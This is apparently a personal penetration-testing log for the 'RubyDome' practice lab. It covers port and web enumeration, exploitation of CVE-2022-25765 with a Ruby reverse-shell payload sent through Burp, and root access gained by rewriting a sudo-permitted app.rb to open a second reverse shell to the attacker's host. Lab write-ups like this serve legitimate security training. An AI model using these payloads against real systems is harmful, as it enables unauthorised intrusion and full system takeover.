RubyDome

๐Ÿงช Pentest Log: {{date:2025-08-23}}

๐Ÿ” Target Information

ip=192.168.217.22

๐Ÿ“ก Enumeration

๐Ÿ”Œ Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 3000

Web Directory Scan

gobuster dir -u http://$ip:3000 -w /usr/share/seclists/Discovery/Web-Content/common.txt

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt

feroxbuster --url http://$ip

wpscan --url http://$ip

dirsearch -u http://$ip -r -o dirsearch.txt

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://$ip$/ -H "Host: FUZZ.website.com"

nikto -h http://$ip

curl -s http://$ip/ | html2markdown

Google for "RubyDome HTML to PDF exploit", found

CVE-2022โ€“25765

๐Ÿ’ฃ Exploitation

๐Ÿ“Œ Vulnerability Summary

๐Ÿš€ Exploit Execution

๐Ÿ”ง Exploit Method

Tool / Script Used:

https://github.com/UNICORDev/exploit-CVE-2022-25765

python3 exploit-CVE-2022-25765.py -s 192.168.45.163 3000

http://%20`ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("192.168.45.163","3000"))'`

Use the payload in the burp request

python3 /home/kali/Documents/oscp/Shell\ Handler/penelope/penelope.py -p 3000

๐Ÿงฌ Privilege Escalation

๐Ÿ‘ค Current Access

๐Ÿ” Enumeration

Sudo

sudo -l

Found

User andrew may run the following commands on rubydome:
    (ALL) NOPASSWD: /usr/bin/ruby /home/andrew/app/app.rb

๐Ÿ”“ Privilege Escalation Exploit

๐Ÿ“Œ Exploit Summary

๐Ÿ”ง Exploit Steps

vi /home/andrew/app/app.rb

spawn("sh",[:in,:out,:err]=>TCPSocket.new("192.168.45.163",22))

sudo /usr/bin/ruby /home/andrew/app/app.rb

python3 /home/kali/Documents/oscp/Shell\ Handler/penelope/penelope.py -p 22